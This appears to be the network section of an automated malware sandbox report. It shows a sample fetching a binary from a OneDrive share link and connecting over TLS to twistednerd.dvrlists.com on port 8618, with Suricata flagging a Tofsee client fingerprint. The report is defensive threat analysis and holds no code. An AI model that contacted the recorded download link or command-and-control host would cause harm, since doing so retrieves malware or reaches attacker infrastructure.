Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
twistednerd.dvrlists.com | 62.102.148.130 | |
apv5oq.sn.files.1drv.com | CNAME sn-files.fe.1drv.com, CNAME l-0003.l-msedge.net | 13.107.42.12 |
onedrive.live.com | CNAME l-0004.l-msedge.net | 13.107.42.13 |
TCP Requests
- 192.168.56.101:49201 -> 13.107.42.12:443 (apv5oq.sn.files.1drv.com)
- 192.168.56.101:49202 -> 13.107.42.12:443 (apv5oq.sn.files.1drv.com)
- 192.168.56.101:49200 -> 13.107.42.13:443 (onedrive.live.com)
- 192.168.56.101:49204 -> 62.102.148.130:8618 (twistednerd.dvrlists.com)
- 192.168.56.101:49212 -> 62.102.148.130:8618 (twistednerd.dvrlists.com)
- 192.168.56.101:49213 -> 62.102.148.130:8618 (twistednerd.dvrlists.com)

UDP Requests
- 192.168.56.101:54056 -> 164.124.101.2:53
- 192.168.56.101:59369 -> 164.124.101.2:53
- 192.168.56.101:61479 -> 164.124.101.2:53
- 192.168.56.101:62324 -> 164.124.101.2:53
- 192.168.56.101:137 -> 192.168.56.255:137
- 192.168.56.101:138 -> 192.168.56.255:138
- 192.168.56.101:49152 -> 239.255.255.250:3702
- 192.168.56.101:62327 -> 239.255.255.250:1900
- 192.168.56.101:62329 -> 239.255.255.250:3702
- 192.168.56.101:62331 -> 239.255.255.250:3702
- 52.231.114.183:123 -> 192.168.56.101:123

HTTP Requests
GET 302 https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ

Request:
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ HTTP/1.1
User-Agent: zipo
Host: onedrive.live.com

Response:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://apv5oq.sn.files.1drv.com/y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
Set-Cookie: E=P:YJezxdtb2Yg=:vhIzSlHsxS8fgnwcJOh1nwq8V0/MNyxvLo5dU1VCct0=:F; domain=.live.com; path=/
Set-Cookie: xid=af875ddc-712a-456d-858d-4a4b145ed8ed&&RD00155D7D6A9D&266; domain=.live.com; path=/
Set-Cookie: xidseq=1; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 10-Aug-2021 07:09:32 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 17-Aug-2021 08:49:32 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RD00155D7D6A9D
X-ODWebServer: canadacentral1-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: E1A0BF7E64E6429291F8CA8DB1B342E6 Ref B: SLAEDGE1112 Ref C: 2021-08-10T08:49:32Z
Date: Tue, 10 Aug 2021 08:49:32 GMT
Content-Length: 0
GET 200 https://apv5oq.sn.files.1drv.com/y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1

Request:
GET /y4mqtDxi_yjQqMj7aLneNR5K2ag2n6a9B3s2vsguKxD6cq_pEbf-AoBavtlpqHoxXjnVTTRodHYAyAVwV2qMV3yT9FJF0ReIQscZaXQGrtQ_Qo0ZTxor0a01qx5w-nMorDgI-I4bWaoFPlMR2GfVgFSbCIl6ErQU5_nxjDMV0u2rSp5S7Vf6y3eFgoL5jbcc9J171z-sNGiboKZE27hENWiuQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1 HTTP/1.1
User-Agent: zipo
Host: apv5oq.sn.files.1drv.com
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 579584
Content-Type: application/octet-stream
Content-Location: https://apv5oq.sn.files.1drv.com/y4mjpi6faKocZEqgEXfBOsjelLVDdAruqiWVYF0koaTv2f3oSGjqjbA-jRn3D3-XDxmobFUTH-APRDkfD1qfEvReT6yGLNI-APgrfZXZBKTdDGNkOxw3nkZ2HxdDy69Wd9WMgR_vVxDrAj822BuujhEjM1QpaslBPkJWRrS0JRtJiS0sRZsknCM8uklMp8exqXR
Expires: Mon, 08 Nov 2021 08:49:33 GMT
Last-Modified: Mon, 09 Aug 2021 18:37:33 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!117.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN4PPF20918D903
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: 7ABtSnRotkyrk/lORhijoQ.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITExNy4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Yjjdwkjkodghbmfmluytpeybrgxrlom"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.725.719.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 0AD930B49BBA4BFAA520009619BC14AF Ref B: SLAEDGE1019 Ref C: 2021-08-10T08:49:32Z
Date: Tue, 10 Aug 2021 08:49:33 GMT
GET 302 https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ

Request:
GET /download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21117&authkey=ALEWR7_oFnUkSBQ HTTP/1.1
User-Agent: aswe
Host: onedrive.live.com
Cache-Control: no-cache
Cookie: E=P:YJezxdtb2Yg=:vhIzSlHsxS8fgnwcJOh1nwq8V0/MNyxvLo5dU1VCct0=:F; xid=af875ddc-712a-456d-858d-4a4b145ed8ed&&RD00155D7D6A9D&266; xidseq=1; wla42=

Response:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: -1
Location: https://apv5oq.sn.files.1drv.com/y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1
Set-Cookie: E=P:P0drxttb2Yg=:iMsrl4GAWYyDys5dkYHZdwpkjRqUorWfnECnwb/8J8k=:F; domain=.live.com; path=/
Set-Cookie: xidseq=2; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Tue, 10-Aug-2021 07:09:33 GMT; path=/
Set-Cookie: wla42=; domain=live.com; expires=Tue, 17-Aug-2021 08:49:33 GMT; path=/
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-MSNServer: RD00155D7D9F1D
X-ODWebServer: canadacentral1-odwebpl
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 215DAB3EDEF74E8B864B8BF69AE0243B Ref B: SLAEDGE1112 Ref C: 2021-08-10T08:49:33Z
Date: Tue, 10 Aug 2021 08:49:33 GMT
Content-Length: 0
GET 200 https://apv5oq.sn.files.1drv.com/y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1

Request:
GET /y4muXeUmSOr2eA8OAZv22ApcwBCduBInlnDD_iP2ohqHowwtZcujQFarcs7juK_0mSRbt6MJSbKteWevTHBIgiv6lJwPrMTfvY1ZebPr11dv0Jj63I1RU3a9kMWmQKSmYqgZFh1LLe2fAR8EZ-z8j-pWLadKuq6Z3fIVgXk84emHccp7oVXqMPta0w5zmX9fkWNqjQ12SMYb696eSzEeW3MLQ/Yjjdwkjkodghbmfmluytpeybrgxrlom?download&psid=1 HTTP/1.1
User-Agent: aswe
Host: apv5oq.sn.files.1drv.com
Cache-Control: no-cache
Connection: Keep-Alive

Response:
HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 579584
Content-Type: application/octet-stream
Content-Location: https://apv5oq.sn.files.1drv.com/y4mjpi6faKocZEqgEXfBOsjelLVDdAruqiWVYF0koaTv2f3oSGjqjbA-jRn3D3-XDxmobFUTH-APRDkfD1qfEvReT6yGLNI-APgrfZXZBKTdDGNkOxw3nkZ2HxdDy69Wd9WMgR_vVxDrAj822BuujhEjM1QpaslBPkJWRrS0JRtJiS0sRZsknCM8uklMp8exqXR
Expires: Mon, 08 Nov 2021 08:49:34 GMT
Last-Modified: Mon, 09 Aug 2021 18:37:33 GMT
Accept-Ranges: bytes
ETag: D6676A9A61E841F3!117.2
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: SN3PPF38F0428E6
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: YrXhHXENW0KjJTTTyWrIjw.0
X-SqlDataOrigin: S
CTag: aYzpENjY3NkE5QTYxRTg0MUYzITExNy4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="Yjjdwkjkodghbmfmluytpeybrgxrlom"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.725.719.2003
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: 84DC09E93AE54BFFB1D9E34D962F8AEB Ref B: SLAEDGE1116 Ref C: 2021-08-10T08:49:33Z
Date: Tue, 10 Aug 2021 08:49:33 GMT
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49201 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49200 -> 13.107.42.13:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49202 -> 13.107.42.12:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49201 -> 13.107.42.12:443 | C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
TLSv1 192.168.56.101:49200 -> 13.107.42.13:443 | C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | CN=onedrive.com | 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de |
TLSv1 192.168.56.101:49202 -> 13.107.42.12:443 | C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 | C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com | 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49 |
TLS 1.3 192.168.56.101:49213 -> 62.102.148.130:8618 | None | None | None |
TLS 1.3 192.168.56.101:49204 -> 62.102.148.130:8618 | None | None | None |
TLS 1.3 192.168.56.101:49212 -> 62.102.148.130:8618 | None | None | None |
Snort Alerts
No Snort Alerts